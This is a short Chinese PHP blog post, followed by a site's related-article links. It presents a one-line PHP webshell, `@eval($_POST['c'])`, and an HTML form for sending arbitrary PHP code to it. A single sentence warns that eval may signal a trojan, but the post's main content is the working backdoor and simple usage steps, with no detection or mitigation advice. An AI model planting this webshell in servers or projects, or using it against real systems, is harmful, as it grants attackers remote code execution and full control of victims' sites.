php eval函数一句话木马代码


Posted in PHP onMay 21, 2015

eval可以用来执行任何其他php代码,所以对于代码里发现了eval函数一定要小心,可能是木马

就这一句话害死人,这样任何人都可以post任何文件上来,所以要做好防范

<?php @eval($_POST['c']);?>

使用方法也很简单,本地提交文件指向提交文件,里面的php代码就会被执行

<html> 
<body> 
<form action="a.php" method="post"> 
<input type="text" name="c" value="phpinfo();"> 
<input type="submit" value="submit"> 
</form> 
</body> 
</html>

以上所述就是本文的全部内容了,希望大家能够喜欢。

PHP 相关文章推荐
php cache类代码(php数据缓存类)
Apr 15 PHP
ThinkPHP 连接Oracle数据库的详细教程[全]
Jul 16 PHP
php中选择什么接口(mysql、mysqli)访问mysql
Feb 06 PHP
不使用php api函数实现数组的交换排序示例
Apr 13 PHP
php使用google地图应用实例
Dec 31 PHP
php多次include后导致全局变量global失效的解决方法
Feb 28 PHP
php转换颜色为其反色的方法
Apr 27 PHP
php数字每三位加逗号的功能函数
Oct 22 PHP
PHP 的比较运算与逻辑运算详解
May 12 PHP
php英文单词统计器
Jun 23 PHP
Thinkphp批量更新数据的方法汇总
Jun 29 PHP
Mac下快速搭建PHP开发环境步骤详解
May 05 PHP
php结合正则批量抓取网页中邮箱地址
May 19 #PHP
php实现模拟登陆方正教务系统抓取课表
May 19 #PHP
PHP IDE phpstorm 常用快捷键
May 18 #PHP
PHP网络操作函数汇总
May 18 #PHP
PHP面向对象之后期静态绑定功能介绍
May 18 #PHP
php中关于socket的系列函数总结
May 18 #PHP
php简单socket服务器客户端代码实例
May 18 #PHP
You might like
《星际争霸重制版》兵种对比图鉴
2020/03/02 星际争霸
深入PHP数据加密详解
2013/06/18 PHP
PHP 设计模式系列之 specification规格模式
2016/01/10 PHP
php下的原生ajax请求用法实例分析
2020/02/28 PHP
浅谈javascript的数据类型检测
2010/07/10 Javascript
php对mongodb的扩展(小试牛刀)
2012/11/11 Javascript
Javascript图像处理—虚拟边缘介绍及使用方法
2012/12/27 Javascript
JavaScript实现关键字高亮功能
2014/11/12 Javascript
Javascript中With语句用法实例
2015/05/14 Javascript
JavaScript检测上传文件大小的方法
2015/07/22 Javascript
Grunt入门教程(自动任务运行器)
2015/08/06 Javascript
js+css实现回到顶部按钮(back to top)
2016/03/02 Javascript
jQuery实现div横向拖拽排序的简单实例
2016/07/13 Javascript
基于jQuery的ajax方法封装
2016/07/14 Javascript
无法获取隐藏元素宽度和高度的解决方案
2017/03/07 Javascript
AngularJS $http模块POST请求实现
2017/04/08 Javascript
浅谈angularjs依赖服务注入写法的注意点
2017/04/24 Javascript
详解如何将angular-ui的图片轮播组件封装成一个指令
2017/05/09 Javascript
浅析python 内置字符串处理函数的使用方法
2014/06/11 Python
python实现画五角星和螺旋线的示例
2019/01/20 Python
Python 实现微信防撤回功能
2019/04/29 Python
python re模块匹配贪婪和非贪婪模式详解
2020/02/11 Python
Python第三方库的几种安装方式(小结)
2020/04/03 Python
Python 通过爬虫实现GitHub网页的模拟登录的示例代码
2020/08/17 Python
python批量合成bilibili的m4s缓存文件为MP4格式 ver2.5
2020/12/01 Python
Html5新标签解释及用法
2012/02/17 HTML / CSS
世界上最具创新性的增强型知名运动品牌:Proviz
2018/04/03 全球购物
服务员岗位职责
2014/01/29 职场文书
作文评语集锦大全
2014/04/23 职场文书
幼儿园校园小喇叭广播稿
2014/10/17 职场文书
预备党员群众路线思想汇报2014
2014/10/25 职场文书
小学中等生评语
2014/12/29 职场文书
销售员岗位职责范本
2015/04/11 职场文书
婚宴主持词
2015/06/30 职场文书
员工考勤管理制度
2015/08/06 职场文书
MySQL sql模式设置引起的问题
2022/05/15 MySQL